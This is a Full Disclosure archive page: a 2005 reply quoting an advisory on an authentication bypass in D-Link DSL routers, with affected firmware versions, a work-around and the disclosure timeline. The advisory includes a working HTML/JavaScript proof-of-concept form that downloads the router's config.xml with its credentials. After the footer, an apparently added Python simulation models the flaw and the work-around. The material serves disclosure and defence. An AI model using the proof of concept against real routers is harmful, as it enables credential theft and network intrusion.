Full Disclosure mailing list archives
Re: D-Link DSL routers authentication bypass
From: Sebastian von Knorring <Sebastian.von.Knorring () iki fi>
Date: Fri, 20 May 2005 17:05:03 +0300 (EEST)
Hello. Could the D-Link DI-604 story at <http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2> be related to this vulnerability? I myself also have a DI-604 that broke down in exactly the same way as described above, and the above was the only similar case I have yet found on the net. My suspicion was also that the box had been hacked, and your vulnerability post now shows that exploitable holes in D-Link boxes exist.

-Sebastian

On Thu, 19 May 2005 16:41:56 +0200 Francesco Orro <francesco.orro () akhela com> wrote:
====================== SUMMARY ========================
Title: D-Link DSL routers authentication bypass
Date: 19 May 2005
Author: Francesco Orro <francesco.orro 4t akhela.com>
Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T
Vendor: D-Link
Vendor URL: http://www.dlink.com
Vendor Status: D-Link was contacted
Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with various firmware versions
Risk: High
Impact: Unauthorized people may gain full access to the device
Vulnerability Description: an undocumented feature allows (in some cases) bypassing the authentication prompt and gaining full access to the router, and then to the network behind it.

====================== BACKGROUND ========================
D-Link DSL routers are commonly used for internet connectivity for home or small office needs. (http://www.dlink.com/products/)

=============== PROBLEM DESCRIPTION ==================
The CGI /cgi-bin/firmwarecfg, when executed, checks for the existence of the file fw_ip under /var/tmp/. If this file exists, all IP addresses listed inside it are given straight access to the device, without the need for authentication. If this file doesn't exist, the CGI creates a new one, putting the requesting address inside.

If the web configuration console is accessible from the internet and nobody has ever called the CGI before (e.g. from a workstation inside the LAN), then everybody can gain access to the router, download the config.xml file which contains user accounts and passwords, gain access to the private network, modify or alter the firmware of the router, etc.

================ ADDITIONAL DETAILS ==================
The vulnerability was found on the following firmware versions:
V1.00B01T16.EN.20040211
V1.00B01T16.EU.20040217
V0.00B01T04.UK.20040220
V1.00B01T16.EN.20040226
V1.00B02T02.EU.20040610
V1.00B02T02.UK.20040618
V1.00B02T02.EU.20040729
V1.00B02T02.DE.20040813
V1.00B02T02.RU.20041014

It can be exploited by a simple HTTP POST with the form:

<html>
<head><title>GetConfig - Config file download</title></head>
<body>
<script type="text/javascript">
function invia_richiesta() {
    /* build the target URL from the host typed into the InputBox form, then submit the POST */
    document.DownloadConfig.action = 'http://' + document.InputBox.Host.value + '/cgi-bin/firmwarecfg';
    document.DownloadConfig.submit();
}
</script>
Download config.xml:
<form name="InputBox">
<br>http://<input name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action="" enctype="multipart/form-data">
<input type="submit" name="config" value="Download" onClick="javascript:invia_richiesta();"><br>
</form>
</body>
</html>

=================== FIX INFORMATION ===================
Currently there is no solution to the problem, since it seems to be a hidden feature. The workaround is to call the CGI /cgi-bin/firmwarecfg from a known address of the local network and/or to disable web console access from the internet.

================ AUTHOR INFORMATION ================
Francesco Orro
Akhela S.r.l. - Operation Group
http://www.akhela.com/
EMail: francesco.orro 4t akhela.com
KeyID: 6CF46D45

=================== DISCLOSURE HISTORY =====================
2 May 2005 - First private release of this advisory;
4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed of the vulnerability;
5 May 2005 - The vendor replied that the problem was resolved in firmware version V1.00B02T02.EU.20040610, but it has been demonstrated that this version is vulnerable too;
19 May 2005 - Public release of this advisory.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
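The fw_ip allow-list behaviour that the quoted advisory attributes to /cgi-bin/firmwarecfg, and the priming work-around it recommends, modelled as an added example. This is not code from the advisory or from D-Link firmware. It assumes (the page does not say) that fw_ip holds one address per line and that the request which creates the file is itself treated as allow-listed; the addresses are constructed from documentation ranges.

```python
"""Model of the /var/tmp/fw_ip allow-list logic that the advisory attributes to
/cgi-bin/firmwarecfg, and of the recommended work-around (priming the file from
a known LAN address). Added example, not the advisory's or D-Link's code."""
import tempfile
from pathlib import Path

# Constructed addresses from documentation ranges, not from any real incident.
ATTACKER = "203.0.113.5"      # an address on the internet side
LAN_HOST = "192.168.1.10"     # a workstation inside the LAN


class FirmwareCfg:
    """Simulates the CGI's fw_ip handling as described in the advisory.

    Assumptions (not stated on the page): fw_ip holds one address per line, and
    the request that creates the file is itself treated as allow-listed.
    """

    def __init__(self, fw_ip_path):
        self.fw_ip_path = Path(fw_ip_path)

    def allowed_addrs(self):
        """Return the set of addresses in fw_ip, or None if the file is absent."""
        if not self.fw_ip_path.exists():
            return None
        lines = self.fw_ip_path.read_text().splitlines()
        return {line.strip() for line in lines if line.strip()}

    def handle_request(self, remote_addr, authenticated=False):
        """Return 'config.xml' if the CGI would serve the config, else 'auth-required'."""
        allowed = self.allowed_addrs()
        if allowed is None:
            # No fw_ip yet: the CGI creates it with the requesting address,
            # whoever that is. From now on that address bypasses authentication.
            self.fw_ip_path.write_text(remote_addr + "\n")
            allowed = {remote_addr}
        if remote_addr in allowed or authenticated:
            return "config.xml"
        return "auth-required"


def run_scenario(prime_lan_addr=None):
    """Fresh router (fw_ip absent). If prime_lan_addr is given, the CGI is first
    called from that LAN address, which is the advisory's work-around."""
    with tempfile.TemporaryDirectory() as tmp:
        cgi = FirmwareCfg(Path(tmp) / "fw_ip")
        if prime_lan_addr is not None:
            cgi.handle_request(prime_lan_addr, authenticated=True)
        # An unauthenticated POST from the internet, then one from the LAN.
        attacker = cgi.handle_request(ATTACKER)
        lan = cgi.handle_request(LAN_HOST)
        return {"attacker": attacker, "lan": lan, "fw_ip": sorted(cgi.allowed_addrs())}


if __name__ == "__main__":
    print("unprimed:", run_scenario())
    print("primed:  ", run_scenario(prime_lan_addr=LAN_HOST))
```

On the unprimed router the attacker's first POST creates fw_ip containing the attacker's own address and is served config.xml; the LAN host is then the one asked to authenticate. On the primed router the LAN address already occupies fw_ip, so the attacker's POST gets the authentication prompt. The advisory does not say whether /var/tmp/fw_ip survives a reboot, so a practitioner relying on priming should assume it may not and repeat the LAN-side request after every restart, or simply follow the second part of the work-around and disable web console access from the internet.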
Current thread:
- D-Link DSL routers authentication bypass Francesco Orro (May 19)
- Re: D-Link DSL routers authentication bypass Luis Peralta (May 20)
- Re: [Bulk] Re: D-Link DSL routers authentication bypass Francesco Orro (May 20)
- Re: D-Link DSL routers authentication bypass Sebastian von Knorring (May 20)
- Re: D-Link DSL routers authentication bypass Luis Peralta (May 20)